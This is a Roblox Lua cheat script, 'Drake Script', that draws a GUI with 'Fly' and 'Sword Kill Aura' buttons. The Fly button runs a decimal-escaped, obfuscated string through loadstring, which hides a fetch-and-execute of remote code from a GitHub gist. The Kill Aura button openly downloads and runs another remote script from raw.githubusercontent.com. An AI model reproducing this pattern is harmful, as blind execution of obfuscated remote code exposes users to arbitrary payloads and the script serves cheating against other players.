game.StarterGui:SetCore("SendNotification", {Title = "Drake Script", Text = "Hi, from Drake", Duration = 3})

wait(1)
game.StarterGui:SetCore("SendNotification", {Title = "Drake Script", Text = "Loading...", Duration = 2})

local gui = Instance.new("ScreenGui")
gui.Name = "DrakeScriptGUI"
gui.ResetOnSpawn = false
gui.Parent = game:GetService("StarterGui")

local frame = Instance.new("Frame")
frame.Size = UDim2.new(0, 200, 0, 170)
frame.Position = UDim2.new(0.5, -100, 0.5, -85)
frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
frame.Parent = gui

local title = Instance.new("TextLabel")
title.Size = UDim2.new(1, 0, 0, 30)
title.Text = "Drake Script"
title.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
title.TextColor3 = Color3.fromRGB(255, 255, 255)
title.Parent = frame

local flyButton = Instance.new("TextButton")
flyButton.Size = UDim2.new(0, 180, 0, 50)
flyButton.Position = UDim2.new(0.5, -90, 0.4, -25)
flyButton.Text = "Fly"
flyButton.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
flyButton.TextColor3 = Color3.fromRGB(255, 255, 255)
flyButton.Parent = frame

local killAuraButton = Instance.new("TextButton")
killAuraButton.Size = UDim2.new(0, 180, 0, 50)
killAuraButton.Position = UDim2.new(0.5, -90, 0.75, -25)
killAuraButton.Text = "Sword Kill Aura"
killAuraButton.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
killAuraButton.TextColor3 = Color3.fromRGB(255, 255, 255)
killAuraButton.Parent = frame

local closeButton = Instance.new("TextButton")
closeButton.Size = UDim2.new(0, 30, 0, 30)
closeButton.Position = UDim2.new(1, -35, 0, 0)
closeButton.Text = "X"
closeButton.BackgroundColor3 = Color3.fromRGB(200, 0, 0)
closeButton.TextColor3 = Color3.fromRGB(255, 255, 255)
closeButton.Parent = frame

local toggleButton = Instance.new("TextButton")
toggleButton.Size = UDim2.new(0, 100, 0, 30)
toggleButton.Position = UDim2.new(0.05, 0, 0.9, 0)
toggleButton.Text = "Show GUI"
toggleButton.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
toggleButton.TextColor3 = Color3.fromRGB(255, 255, 255)
toggleButton.Parent = gui
toggleButton.Visible = false

flyButton.MouseButton1Click:Connect(function()
    loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\103\105\115\116\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\109\101\111\122\111\110\101\89\84\47\98\102\48\51\55\100\102\102\57\102\48\97\55\48\48\49\55\51\48\52\100\100\100\54\55\102\100\99\100\51\55\48\47\114\97\119\47\101\49\52\101\55\52\102\52\50\53\98\48\54\48\100\102\53\50\51\51\52\51\99\102\51\48\98\55\56\55\48\55\52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")()
end)

killAuraButton.MouseButton1Click:Connect(function()
    game.StarterGui:SetCore("SendNotification", {Title = "Drake Script", Text = "Executed", Duration = 2})
    loadstring(game:HttpGet("https://raw.githubusercontent.com/BINODTHARU10/Fe-fight/main/Kill%20aura"))()
end)

closeButton.MouseButton1Click:Connect(function()
    frame.Visible = false
    toggleButton.Visible = true
end)

toggleButton.MouseButton1Click:Connect(function()
    frame.Visible = true
    toggleButton.Visible = false
end)

gui.Enabled = true
